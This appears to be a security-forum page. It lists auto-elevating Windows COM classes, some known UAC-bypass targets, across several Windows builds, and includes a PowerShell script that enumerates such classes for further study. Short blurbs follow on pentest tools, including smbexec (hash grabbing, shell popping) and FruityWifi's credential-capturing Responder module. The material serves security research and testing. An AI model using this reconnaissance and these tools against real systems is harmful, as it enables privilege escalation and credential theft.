LAN Connection UI Class {7007ACC5-3202-11D1-AAD2-00805FC1270E}
Network Common Connections Ui {7007ACD1-3202-11D1-AAD2-00805FC1270E}
Windows SideShow AutoWake Configuration Helper {71B804C5-5577-471D-8FE5-C4A45B654EB8}
Sharing Elevated Virtual Factory {72A7994A-3092-4054-B6BE-08FF81AEEFFC}
FwCpl LUA {752438CB-E941-433F-BCB4-8B7D2329F0C8}
Connect to a Network Projector {76052C5C-2EB4-4C40-B1F1-2A5C8554590A}
Sensors CPL Change Description LUA Helper {76AE5F57-B7C9-421f-B55E-FB25144317B6}
XWizard Task Stub {777BA815-2498-4875-933A-3067DE883070}
XWizard Page Stub {777BA816-2498-4875-933A-3067DE883070}
XWizard Virtual Factory {777BA81A-2498-4875-933A-3067DE883070}
Private XWizard Registration Manager Class {777BA8F5-2498-4875-933A-3067DE883070}
Private XWizard Factory Registration Manager Class {777BA8F9-2498-4875-933A-3067DE883070}
Private XWizard Type Registration Manager Class {777BA8FB-2498-4875-933A-3067DE883070}
Network and Sharing Center Cpl Elevated Virtual Factory {7A076CE1-4B31-452a-A4F1-0304C8738100}
Shell FMIFS Wrapper {7aa7790d-75d7-484b-98a1-3913d022091d}
HomeGroup Password {7be73787-ce71-4b33-b4c8-00d32b54bea8}
HomeGroup Printing Device Class {7DF8EF76-D449-485f-B4EB-58DC96B31EDB}
WlanConn LUA {868A2E25-D6C1-450b-8510-734A4AFEE8BC}
Virtual Factory for Usercpl {86d5eb8a-859f-4c7b-a76b-2bd819b7a850}
CElevateWlanUi {86F80216-5DD6-4F43-953B-35EF40A35AEE}
Virtual Factory for Action Center CPL {8D26D9AA-5DA8-4b95-949A-B74954A229A6}
Virtual Factory for Recovery {9200689A-F979-4eea-8830-0E1D6B74821F}
Default Location CPL Data Handler LUA Helper {9A630456-078D-43d3-9F1D-DF7A5BC0FA44}
Date and Time Properties {9df523b0-a6c0-4ea9-b5f1-f4565c3ac8b8}
{A0ADD4EC-5BD3-4f70-A47B-07797A45C635}
WlanPref LUA {A25821B5-F310-41BD-806F-5864CC441B78}
Microsoft Windows Defender {A2D75874-6750-4931-94C1-C99D3BC9D0C7}
Windows Parental Controls {A2D8CFE7-7BA4-4bad-B86B-851376B59134}
Virtual Factory for Windows Firewall Cpl {A4B07E49-6567-4FB8-8D39-01920E3B2357}
Shell ChkdskEx Dialog {a4c31131-ff70-4984-afd6-0609ced53ad6}
Mcx2Uninstall Class {A4E118DF-B9E5-4B42-888C-065CEAF8DDC3}
Secure Startup {A7A63E5C-3877-4840-8727-C1EA9D7A4D50}
RemMdmObj Class {A9710FB5-1840-4224-BD42-86831E28E43A}
MBN Pin Unblock page {b70cc729-28ae-11dd-9676-000000000000}
Connection Manager LUA Host Object {BA126F01-2166-11D1-B1D0-00805FC1270E}
WlanAdhoc LUA {BB2D41DF-7E34-4F06-8F51-007C9CAD36BE}
Virtual Factory for Power Options Control Panel {BBD8C065-5E6C-4e88-BFD7-BE3E6D1C063B}
CLSID_PrivJITDebuggingHost {BBE60DE4-551F-444A-81AB-70ADAF417C5D}
DfsShellAdmin Class {BCEA735B-4DAC-4B71-9C47-1D560AFD2A9B}
Network Center LUA {C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB}
WCN Elevation Helper {C100BEBB-D33A-4a4b-BF23-BBEF4663D017}
Network Diagnostics Framework {C529C7EF-A3AF-45F2-8A47-767B33AA5CC0}
PNPX Association Class {cee8ccc9-4f6b-4469-a235-5a22869eef03}
Windows SideShow Device Configuration Helper {D3667F1E-CCB8-4A69-99DF-59A2B2A6753F}
CIEInetcplRasBroker {d63c23c5-53e6-48d5-adda-a385b6bb9c7b}
Bluewire Elevated Unpairing Handler {D88EC52B-8D57-49e1-9EB3-4D267D68A2AE}
Advanced Configuration Dialog {DCED8DB0-11A5-4b16-AB9D-4E28CA38C99F}
Microsoft.VisualStudio.ProductKeyDialog.ElevatedLicensingState {DED3CB50-510E-469B-A362-AB3581D83A2F}
SDChangeObj Class {E1BA41AD-4A1D-418F-AABA-3D1196B423D3}
HNetCfg.FwPolicy2 {E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}
Security Center {E9495B87-D950-4ab5-87A5-FF6D70BF3E90}
User Account Control Settings {EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}
HNetCfg.FwAuthorizedApplication {EC9846B3-2762-4A6B-A214-6ACB603462D2}
PerfCenter Enabler {f4be747e-45c4-4701-90f1-d49d9ac30248}
Internet Shortcut {FBF23B40-E3F0-101B-8488-00AA003E56F8}
ARP UninstallString Launcher {FCC74B77-EC3E-4dd8-A80B-008A702075A9}
Elevatable Shortcut {ff9e6131-a8c1-4188-aa03-82e9f10a05a8}
HomeGroup CPL Advanced Settings Writer {ffe1df5f-9f06-46d3-af27-f1fc10d63892}

Windows 8.1 x64 9600

CEIPLuaElevationHelper {01D0A625-782D-4777-8D4E-547E6457FAD5}
{08d450b7-f7e5-4424-8229-11888adb7c14}
RasDlg LUA {0C3B05FB-3498-40C3-9C03-4B22D735550C}
HNetCfg.FwOpenPort {0CA545C6-37AD-4A6C-BF92-9F7610067EF5}
ARP CBS Uninstaller Proxy {0da7bfdf-c0a0-44eb-be82-b7a82c4721de}
WUAppElevator class {1138506a-b949-46a7-b6c0-ee26499fdeaf}
VistaWUWebControl Class {12a66224-5e8a-4679-8941-0b9b960bf5ea}
Virtual Factory for DiagCpl {12C21EA7-2EB8-4B55-9249-AC243DA8C666}
TPM Virtual Smart Card Manager {16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A}
SPPLUAObject Class {179CC917-3A82-40E7-9F8C-2FC8A3D2212B}
Share Media Settings Writer {19BA17F2-2602-4E77-9027-103894607626}
Create
New Link {1BA783C1-2A30-4ad3-B928-A9A46C604C28} Lpksetup LUA Elevation {1C749B87-568C-4865-8E73-6413F8372CE6} Shell Indexer Admin Object {1E1714A3-50B9-480b-A94A-636D9A9B56D1} Security Shell Extension {1f2e5c40-9550-11ce-99d2-00aa006e086c} Microsoft Disk Quota UI Elevation Helper {1fb2a002-4c6c-4de7-85c2-cb8db9a4f728} Detection And Sharing {1fda955b-61ff-11da-978c-0008744faab7} WUPublishedAppInstallorElevator Class {26D32566-760A-40A2-AA82-A40366528916} FaultrepElevatedDataCollection {2C256447-3F0D-4CBB-9D12-575BB20CDA0A} HNetCfg.FwRule {2C5BC43E-3369-4C33-AB0C-BE9469677AF4} Advanced Indexing Options Dialog Object {2F2165FF-2C2D-4612-87B2-CC8E5002EF4C} HNetCfg.FwMgr {304CE942-6E39-40D8-943A-B913C40C9CD4} CtTuner Class {32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF} Copy/Move/Rename/Delete/Link Object {3ad05575-8857-4850-9277-11b85bdb8e09} CMLUAUTIL {3E000D72-A845-4CD9-BD83-80C07C3B881F} CMSTPLUA {3E5FC7F9-9A51-4367-9063-A120244FBEC7} AccesibilityCplAdmin Class {434A6274-C539-4E99-88FC-44206D942775} Home Networking Configuration Manager {46C166AA-3108-11D4-9348-00C04F8EEB71} CIEContentAdvisorBroker {46CB32FA-B5CA-8A3A-62CA-A7023C0496C5} Virtual Factory for Languages Configuration {4A3F2F56-454A-4CC5-9734-BB7D8141AC0A} RasGcw LUA {4A6B8BAD-9872-4525-A812-71A52367DC17} CIERegistryHKLMBroker {4b360c3c-d284-4384-abcc-ef133e1445da} ERCLuaElevationHelper {4BC67F23-D805-4384-BCA3-6F1EDFF50E2C} Shell Security Editor {4D111E08-CBF7-4f12-A926-2C7920AF52FC} AddMdmObj Class {4DF929E7-4C5E-4587-A598-7ED7B3D6E462} LayerUIPropPage {513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8} Region and Language UAC Elevation {514B5E31-5596-422F-BE58-D804464683B5} Shell Disc Image Mount {51a1467f-96a2-4b1c-9632-4b4d950fe216} FaxCommon Class {59347292-B72D-41F2-98C5-E9ACA1B247A2} IE Spelling Dictionary Installer Broker {5bbd58bb-993e-4c17-8af6-3af8e908fca8} Developer License Launcher {5C917E9C-0B2F-40D6-928B-5C43FDB16DF4} Mount Point Rename {60173D16-A550-47f0-A14B-C6F9E4DA0831} NAP Elevated class 
{677126ed-2a91-40ff-8c52-06181c064573} PortableWorkspaceLauncher Class {698F7D05-37F0-4902-8A63-AEF7D44DC7FC} Sensors CPL Change Device Permission LUA Helper {6CE51F75-0448-438e-B9CA-69C352A248A7} Advanced Indexing Options Dialog Object {6D3951EB-0B07-4fb8-B703-7C5CEE0DB578} LAN Connection UI Class {7007ACC5-3202-11D1-AAD2-00805FC1270E} Network Common Connections Ui {7007ACD1-3202-11D1-AAD2-00805FC1270E} Sharing Elevated Virtual Factory {72A7994A-3092-4054-B6BE-08FF81AEEFFC} FwCpl LUA {752438CB-E941-433F-BCB4-8B7D2329F0C8} XWizard Task Stub {777BA815-2498-4875-933A-3067DE883070} XWizard Page Stub {777BA816-2498-4875-933A-3067DE883070} XWizard Virtual Factory {777BA81A-2498-4875-933A-3067DE883070} Private XWizard Registration Manager Class {777BA8F5-2498-4875-933A-3067DE883070} Private XWizard Factory Registration Manager Class {777BA8F9-2498-4875-933A-3067DE883070} Private XWizard Type Registration Manager Class {777BA8FB-2498-4875-933A-3067DE883070} Network and Sharing Center Cpl Elevated Virtual Factory {7A076CE1-4B31-452a-A4F1-0304C8738100} Shell FMIFS Wrapper {7aa7790d-75d7-484b-98a1-3913d022091d} HomeGroup Password {7be73787-ce71-4b33-b4c8-00d32b54bea8} HomeGroup Printing Device Class {7DF8EF76-D449-485f-B4EB-58DC96B31EDB} Virtual Factory for Usercpl {86d5eb8a-859f-4c7b-a76b-2bd819b7a850} CElevateWlanUi {86F80216-5DD6-4F43-953B-35EF40A35AEE} Virtual Factory for Recovery {9200689A-F979-4eea-8830-0E1D6B74821F} Date and Time Properties {9df523b0-a6c0-4ea9-b5f1-f4565c3ac8b8} {A0ADD4EC-5BD3-4f70-A47B-07797A45C635} WlanPref LUA {A25821B5-F310-41BD-806F-5864CC441B78} Microsoft Windows Defender {A2D75874-6750-4931-94C1-C99D3BC9D0C7} Windows Parental Controls {A2D8CFE7-7BA4-4bad-B86B-851376B59134} Virtual Factory for Windows Firewall Cpl {A4B07E49-6567-4FB8-8D39-01920E3B2357} Shell ChkdskEx Dialog {a4c31131-ff70-4984-afd6-0609ced53ad6} CLSID_ResetEASPolicies {A5EAE54D-9886-4B8D-AA78-EAFF38D011CA} Virtual Factory for MaintenanceUI {A6BFEA43-501F-456F-A845-983D3AD7B8F0} 
Secure Startup {A7A63E5C-3877-4840-8727-C1EA9D7A4D50} RemMdmObj Class {A9710FB5-1840-4224-BD42-86831E28E43A} Connection Manager LUA Host Object {BA126F01-2166-11D1-B1D0-00805FC1270E} WlanAdhoc LUA {BB2D41DF-7E34-4F06-8F51-007C9CAD36BE} Virtual Factory for Power Options Control Panel {BBD8C065-5E6C-4e88-BFD7-BE3E6D1C063B} DfsShellAdmin Class {BCEA735B-4DAC-4B71-9C47-1D560AFD2A9B} Network Center LUA {C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} WCN Elevation Helper {C100BEBB-D33A-4a4b-BF23-BBEF4663D017} Network Diagnostics Framework {C529C7EF-A3AF-45F2-8A47-767B33AA5CC0} FsrmPropertiesPropSheet Class {C88A4279-5ADC-4465-927F-6B19777AA5F9} PNPX Association Class {cee8ccc9-4f6b-4469-a235-5a22869eef03} CIEInetcplRasBroker {d63c23c5-53e6-48d5-adda-a385b6bb9c7b} Advanced Configuration Dialog {DCED8DB0-11A5-4b16-AB9D-4E28CA38C99F} SDChangeObj Class {E1BA41AD-4A1D-418F-AABA-3D1196B423D3} HNetCfg.FwPolicy2 {E2B3C97F-6AE1-41AC-817A-F6F92166D7DD} Set Network Location Class Factory {E5A040E9-1097-4D24-B89E-3C730036D615} Security Center {E9495B87-D950-4ab5-87A5-FF6D70BF3E90} Remove Device Elevated Handler {E95186C7-7D80-4311-843D-0702CBC8B1E4} User Account Control Settings {EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8} HNetCfg.FwAuthorizedApplication {EC9846B3-2762-4A6B-A214-6ACB603462D2} PerfCenter Enabler {f4be747e-45c4-4701-90f1-d49d9ac30248} Internet Shortcut {FBF23B40-E3F0-101B-8488-00AA003E56F8} ARP UninstallString Launcher {FCC74B77-EC3E-4dd8-A80B-008A702075A9} Elevatable Shortcut {ff9e6131-a8c1-4188-aa03-82e9f10a05a8} HomeGroup CPL Advanced Settings Writer {ffe1df5f-9f06-46d3-af27-f1fc10d63892} Windows 10 TP x64 9901 CEIPLuaElevationHelper {01D0A625-782D-4777-8D4E-547E6457FAD5} {08d450b7-f7e5-4424-8229-11888adb7c14} RasDlg LUA {0C3B05FB-3498-40C3-9C03-4B22D735550C} HNetCfg.FwOpenPort {0CA545C6-37AD-4A6C-BF92-9F7610067EF5} ARP CBS Uninstaller Proxy {0da7bfdf-c0a0-44eb-be82-b7a82c4721de} WUAppElevator class {1138506a-b949-46a7-b6c0-ee26499fdeaf} VistaWUWebControl Class 
{12a66224-5e8a-4679-8941-0b9b960bf5ea} Virtual Factory for DiagCpl {12C21EA7-2EB8-4B55-9249-AC243DA8C666} TPM Virtual Smart Card Manager {16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A} SPPLUAObject Class {179CC917-3A82-40E7-9F8C-2FC8A3D2212B} Share Media Settings Writer {19BA17F2-2602-4E77-9027-103894607626} Create New Link {1BA783C1-2A30-4ad3-B928-A9A46C604C28} Lpksetup LUA Elevation {1C749B87-568C-4865-8E73-6413F8372CE6} Shell Indexer Admin Object {1E1714A3-50B9-480b-A94A-636D9A9B56D1} Security Shell Extension {1f2e5c40-9550-11ce-99d2-00aa006e086c} Microsoft Disk Quota UI Elevation Helper {1fb2a002-4c6c-4de7-85c2-cb8db9a4f728} Detection And Sharing {1FDA955B-61FF-11DA-978C-0008744FAAB7} WUPublishedAppInstallorElevator Class {26D32566-760A-40A2-AA82-A40366528916} FaultrepElevatedDataCollection {2C256447-3F0D-4CBB-9D12-575BB20CDA0A} HNetCfg.FwRule {2C5BC43E-3369-4C33-AB0C-BE9469677AF4} Advanced Indexing Options Dialog Object {2F2165FF-2C2D-4612-87B2-CC8E5002EF4C} HNetCfg.FwMgr {304CE942-6E39-40D8-943A-B913C40C9CD4} CtTuner Class {32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF} Copy/Move/Rename/Delete/Link Object {3ad05575-8857-4850-9277-11b85bdb8e09} CMLUAUTIL {3E000D72-A845-4CD9-BD83-80C07C3B881F} CMSTPLUA {3E5FC7F9-9A51-4367-9063-A120244FBEC7} AccesibilityCplAdmin Class {434A6274-C539-4E99-88FC-44206D942775} Home Networking Configuration Manager {46C166AA-3108-11D4-9348-00C04F8EEB71} CIEContentAdvisorBroker {46CB32FA-B5CA-8A3A-62CA-A7023C0496C5} Virtual Factory for Languages Configuration {4A3F2F56-454A-4CC5-9734-BB7D8141AC0A} RasGcw LUA {4A6B8BAD-9872-4525-A812-71A52367DC17} CIERegistryHKLMBroker {4b360c3c-d284-4384-abcc-ef133e1445da} ERCLuaElevationHelper {4BC67F23-D805-4384-BCA3-6F1EDFF50E2C} Shell Security Editor {4D111E08-CBF7-4f12-A926-2C7920AF52FC} AddMdmObj Class {4DF929E7-4C5E-4587-A598-7ED7B3D6E462} LayerUIPropPage {513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8} Region and Language UAC Elevation {514B5E31-5596-422F-BE58-D804464683B5} Shell Disc Image Mount 
{51a1467f-96a2-4b1c-9632-4b4d950fe216} FaxCommon Class {59347292-B72D-41F2-98C5-E9ACA1B247A2} IE Spelling Dictionary Installer Broker {5bbd58bb-993e-4c17-8af6-3af8e908fca8} Developer License Launcher {5C917E9C-0B2F-40D6-928B-5C43FDB16DF4} Mount Point Rename {60173D16-A550-47f0-A14B-C6F9E4DA0831} PortableWorkspaceLauncher Class {698F7D05-37F0-4902-8A63-AEF7D44DC7FC} Advanced Indexing Options Dialog Object {6D3951EB-0B07-4fb8-B703-7C5CEE0DB578} LAN Connection UI Class {7007ACC5-3202-11D1-AAD2-00805FC1270E} Network Common Connections Ui {7007ACD1-3202-11D1-AAD2-00805FC1270E} Sharing Elevated Virtual Factory {72A7994A-3092-4054-B6BE-08FF81AEEFFC} FwCpl LUA {752438CB-E941-433F-BCB4-8B7D2329F0C8} XWizard Task Stub {777BA815-2498-4875-933A-3067DE883070} XWizard Page Stub {777BA816-2498-4875-933A-3067DE883070} XWizard Virtual Factory {777BA81A-2498-4875-933A-3067DE883070} Private XWizard Registration Manager Class {777BA8F5-2498-4875-933A-3067DE883070} Private XWizard Factory Registration Manager Class {777BA8F9-2498-4875-933A-3067DE883070} Private XWizard Type Registration Manager Class {777BA8FB-2498-4875-933A-3067DE883070} Network and Sharing Center Cpl Elevated Virtual Factory {7A076CE1-4B31-452a-A4F1-0304C8738100} Shell FMIFS Wrapper {7aa7790d-75d7-484b-98a1-3913d022091d} HomeGroup Password {7be73787-ce71-4b33-b4c8-00d32b54bea8} HomeGroup Printing Device Class {7DF8EF76-D449-485f-B4EB-58DC96B31EDB} Virtual Factory for Usercpl {86d5eb8a-859f-4c7b-a76b-2bd819b7a850} CElevateWlanUi {86F80216-5DD6-4F43-953B-35EF40A35AEE} Virtual Factory for Recovery {9200689A-F979-4eea-8830-0E1D6B74821F} Date and Time Properties {9df523b0-a6c0-4ea9-b5f1-f4565c3ac8b8} {A0ADD4EC-5BD3-4f70-A47B-07797A45C635} WlanPref LUA {A25821B5-F310-41BD-806F-5864CC441B78} Microsoft Windows Defender {A2D75874-6750-4931-94C1-C99D3BC9D0C7} Windows Parental Controls {A2D8CFE7-7BA4-4bad-B86B-851376B59134} Virtual Factory for Windows Firewall Cpl {A4B07E49-6567-4FB8-8D39-01920E3B2357} Shell ChkdskEx Dialog 
{a4c31131-ff70-4984-afd6-0609ced53ad6} CLSID_ResetEASPolicies {A5EAE54D-9886-4B8D-AA78-EAFF38D011CA} Virtual Factory for MaintenanceUI {A6BFEA43-501F-456F-A845-983D3AD7B8F0} Secure Startup {A7A63E5C-3877-4840-8727-C1EA9D7A4D50} RemMdmObj Class {A9710FB5-1840-4224-BD42-86831E28E43A} Connection Manager LUA Host Object {BA126F01-2166-11D1-B1D0-00805FC1270E} WlanAdhoc LUA {BB2D41DF-7E34-4F06-8F51-007C9CAD36BE} Virtual Factory for Power Options Control Panel {BBD8C065-5E6C-4e88-BFD7-BE3E6D1C063B} DfsShellAdmin Class {BCEA735B-4DAC-4B71-9C47-1D560AFD2A9B} Network Center LUA {C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} WCN Elevation Helper {C100BEBB-D33A-4a4b-BF23-BBEF4663D017} Network Diagnostics Framework {C529C7EF-A3AF-45F2-8A47-767B33AA5CC0} FodHelperComObject Class {C6B167EA-DB3E-4659-BADC-D1CCC00EFE9C} FsrmPropertiesPropSheet Class {C88A4279-5ADC-4465-927F-6B19777AA5F9} PNPX Association Class {cee8ccc9-4f6b-4469-a235-5a22869eef03} CIEInetcplRasBroker {d63c23c5-53e6-48d5-adda-a385b6bb9c7b} Advanced Configuration Dialog {DCED8DB0-11A5-4b16-AB9D-4E28CA38C99F} SDChangeObj Class {E1BA41AD-4A1D-418F-AABA-3D1196B423D3} HNetCfg.FwPolicy2 {E2B3C97F-6AE1-41AC-817A-F6F92166D7DD} Set Network Location Class Factory {E5A040E9-1097-4D24-B89E-3C730036D615} Security Center {E9495B87-D950-4ab5-87A5-FF6D70BF3E90} Remove Device Elevated Handler {E95186C7-7D80-4311-843D-0702CBC8B1E4} User Account Control Settings {EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8} HNetCfg.FwAuthorizedApplication {EC9846B3-2762-4A6B-A214-6ACB603462D2} PerfCenter Enabler {f4be747e-45c4-4701-90f1-d49d9ac30248} Internet Shortcut {FBF23B40-E3F0-101B-8488-00AA003E56F8} ARP UninstallString Launcher {FCC74B77-EC3E-4dd8-A80B-008A702075A9} Elevatable Shortcut {ff9e6131-a8c1-4188-aa03-82e9f10a05a8} HomeGroup CPL Advanced Settings Writer {ffe1df5f-9f06-46d3-af27-f1fc10d63892} Source
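Added example, not part of the original post: a PowerShell snippet that reproduces the kind of snapshot listed above. A COM class becomes a candidate for the elevation moniker when its CLSID key carries an Elevation subkey with Enabled set to 1; the script walks HKLM\SOFTWARE\Classes\CLSID (and the Wow6432Node view on x64) for exactly that registration and reports the name, the LocalizedString shown in the UAC prompt, and the server binary, which is the information you need before opening the class in OleView. The function name and the output columns are the example's own choices, not anything the post defines.

```powershell
# Added example (not from the original post): list COM classes registered with
# Elevation\Enabled = 1, the registration the snapshots above were built from.
# HKLM\SOFTWARE\Classes is read directly instead of HKCR because HKCR also
# merges per-user classes from HKCU and the HKCR: drive is not mapped by default.
$roots = @(
    'HKLM:\SOFTWARE\Classes\CLSID',              # 64-bit registrations
    'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID'   # 32-bit registrations on x64
)

function Get-ElevatedComClasses {
    param([string[]]$Roots)
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }
        Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
            $elevKey = Join-Path $_.PSPath 'Elevation'
            if (-not (Test-Path $elevKey)) { return }
            $enabled = (Get-ItemProperty -Path $elevKey -ErrorAction SilentlyContinue).Enabled
            if ($enabled -ne 1) { return }

            $props = Get-ItemProperty -Path $_.PSPath
            # Server hosting the object: LocalServer32 is an out-of-process EXE,
            # InProcServer32 a DLL that runs elevated inside a dllhost.exe surrogate.
            $server = foreach ($k in 'LocalServer32', 'InProcServer32') {
                $p = Join-Path $_.PSPath $k
                if (Test-Path $p) { "$k=" + (Get-ItemProperty -Path $p).'(default)' }
            }
            [PSCustomObject]@{
                CLSID     = $_.PSChildName
                Name      = $props.'(default)'
                # Indirect string (@dll,-id) that the UAC consent dialog displays
                Localized = $props.LocalizedString
                Server    = ($server -join '; ')
                View      = $root
            }
        }
    }
}

Get-ElevatedComClasses -Roots $roots |
    Sort-Object CLSID |
    Format-Table CLSID, Name, Server -AutoSize
```

Run it from an elevated or a normal session; reading these keys needs no admin rights. To compare builds the way the three snapshots above do, pipe the function's output to Export-Csv on each machine and feed the two files to Compare-Object on the CLSID column; entries that appear only on the newer build are the ones worth a first look in OleView.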
-
Yersinia is a network tool designed to take advantage of some weaknesses in different network protocols. It aims to be a solid framework for analyzing and testing the deployed networks and systems. Download: https://github.com/tomac/yersinia
-
A rapid tool based on a psexec-style attack with Samba tools.

Key features:
- Enumerate systems with a domain admin logged in
- Grab hashes
- Extract cached creds (based on cachedump)
- Remote login validation
- Dump cleartext credentials
- Pop shells

Includes:
- smbexec.sh
- installer.sh
- patches to compile binaries
- source for samba-3.6.9 and winexe-1.00

Download: https://github.com/pentestgeek/smbexec
-
WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation. The suite currently contains a spectrum of efficient, fast and stable web tools (Crawler, Bruteforcer, Fuzzer, Proxy, Editor) and some extra functionality tools (Scripting Filters, List Generator, External Proxy). Download: Sunrise Technologies
-
FruityWifi is a wireless network auditing tool based on the Wifi Pineapple idea. The application can be installed on any Debian-based system. Tested on Debian, Kali Linux, BugTraq, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi). With the new version it is possible to install external modules. This functionality gives the user more flexibility, and FruityWifi can be customized. The modules can be added or removed at any time using the on-line repository. A new modules panel was added to the status page; all modules can be enabled/disabled from this panel. The new phishing option allows enabling/disabling the feature from the status page. The Responder.py module has been released and can be installed from the modules page (an HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server can be enabled to capture users, passwords and NTLM/LM hashes). Download: https://github.com/xtr4nge/FruityWifi
-
Dependency-Check is a utility that attempts to detect publicly disclosed vulnerabilities contained within project dependencies. It does this by determining if there is a Common Platform Enumeration (CPE) identifier for a given dependency. If found, it will generate a report linking to the associated CVE entries. Documentation and links to production binary releases can be found on the github pages. Additionally, more information about the architecture and ways to extend dependency-check can be found on the wiki. Download: https://github.com/jeremylong/DependencyCheck
-
GoLismero is an open source framework for security testing. It’s currently geared towards web security, but it can easily be expanded to other kinds of scans. Download: https://github.com/golismero/golismero
-
Damn Vulnerable iOS App (DVIA) is an iOS application that is damn vulnerable. Its main goal is to provide a platform to mobile security enthusiasts/professionals or students to test their iOS penetration testing skills in a legal environment. Download: Downloads - DVIA (Damn Vulnerable iOS App)
-
NINJA-PingU (NINJA-PingU Is Not Just a Ping Utility) is a free, open-source, high-performance network scanner for large-scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration. Download: https://github.com/OWASP/NINJA-PingU
-
ModSecurity™ is an open-source, free web application firewall (WAF) Apache module. With over 70% of all attacks now carried out at the web application level, organizations need all the help they can get in making their systems secure. Download: ModSecurity: Download Code
-
iGoat is a learning tool for iOS developers (iPhone, iPad, etc.). It was inspired by the WebGoat project, and has a similar conceptual flow to it. As such, iGoat is a safe environment where iOS developers can learn about the major security pitfalls they face as well as how to avoid them. It is made up of a series of lessons that each teach a single (but vital) security lesson. iGoat is free software, released under the GPLv3 license. Download: https://code.google.com/p/owasp-igoat/wiki/NewDownloads
-
Cuckoo Sandbox is a malware analysis system. It simply means that you can throw any suspicious file at it and in a matter of seconds Cuckoo will provide you with detailed results outlining what that file did when executed inside an isolated environment. Download: Automated Malware Analysis - Cuckoo Sandbox